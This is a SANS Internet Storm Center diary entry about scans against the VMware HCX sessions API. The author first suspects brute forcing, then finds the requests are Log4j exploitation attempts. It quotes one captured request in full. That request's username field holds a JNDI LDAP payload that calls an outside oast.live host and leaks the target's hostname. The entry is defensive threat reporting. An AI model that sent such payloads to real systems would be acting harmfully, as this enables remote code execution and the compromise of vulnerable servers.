Scans for VMWare Hybrid Cloud Extension (HCX) API (Log4j - not brute forcing)

    Published: 2025-03-12. Last Updated: 2025-03-12 14:37:57 UTC
    by Johannes Ullrich (Version: 1)
    0 comment(s)

    Today, I noticed increased scans for the VMWare Hyprid Cloud Extension (HCX) "sessions" endpoint. These endpoints are sometimes associated with exploit attempts for various VMWare vulnerabilities to determine if the system is running the extensions or to gather additional information to aid exploitation.

    Initially, based on the URL, I suspected brute forcing. However, after reviewing some complete requests (see below), it turns out that these attempts are exploiting the Log4j vulnerability.

    The specific URL seen above is 

    /hybridity/api/sessions

    This particular request is likely used to brute force credentials. the "sessions" endpoint expects a JSON payload with the username and payload like:

    {
      "username": "admin",
      "password": "somecomplexpassword"
    }

    The response will either be a 401 response if the authentication failed or a 200 response if it succeeded. A successful response includes a "sessionId", which will be used as a bearer token to authenticate additional requests.

    UPDATED ANALYSIS

    Initially, I did not have access to the request payload. However, after reviewing the payload of a few samples, it looks like these are not brute-force attempts. Instead, they are exploiting the Log4j vulnerability via the "username" parameter, which is likely logged and VMware is using the Log4j library and was vulnerable to the related vulnerability.

    Complete request:

    POST /hybridity/api/sessions HTTP/1.1
    User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
    Connection: close
    Content-Length: 169
    Accept: application/json
    Content-Type: application/json
    Origin: https://[victim IP]:4443
    Accept-Encoding: gzip

    {\r\n  "authType": "password",\r\n  "username": "${jndi:ldap://${:-670}${:-930}.${hostName}.username.cv7u8tq2cnhfm80gc3n0npwaauo98azq9.oast.live}",\r\n  "password": "admin"\r\n}

    So far, we see these requests mostly from one IP address: 107.173.125.163 using randomized valid user agents. The IP address was first seen yesterday in our logs and is scanning for Log4j vulnerable systems, particularly by accessing login pages. These other attempts likely use a payload similar to the request above.  See this page for a complete list of requests sent by this IP address.

     

     

     

    ---
    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
    Twitter|

    Keywords: hcx vmware
    0 comment(s)
    ISC Stormcast For Wednesday, March 12th, 2025 https://isc.sans.edu/podcastdetail/9360

      Comments

      Login here to join the discussion.


      Diary Archives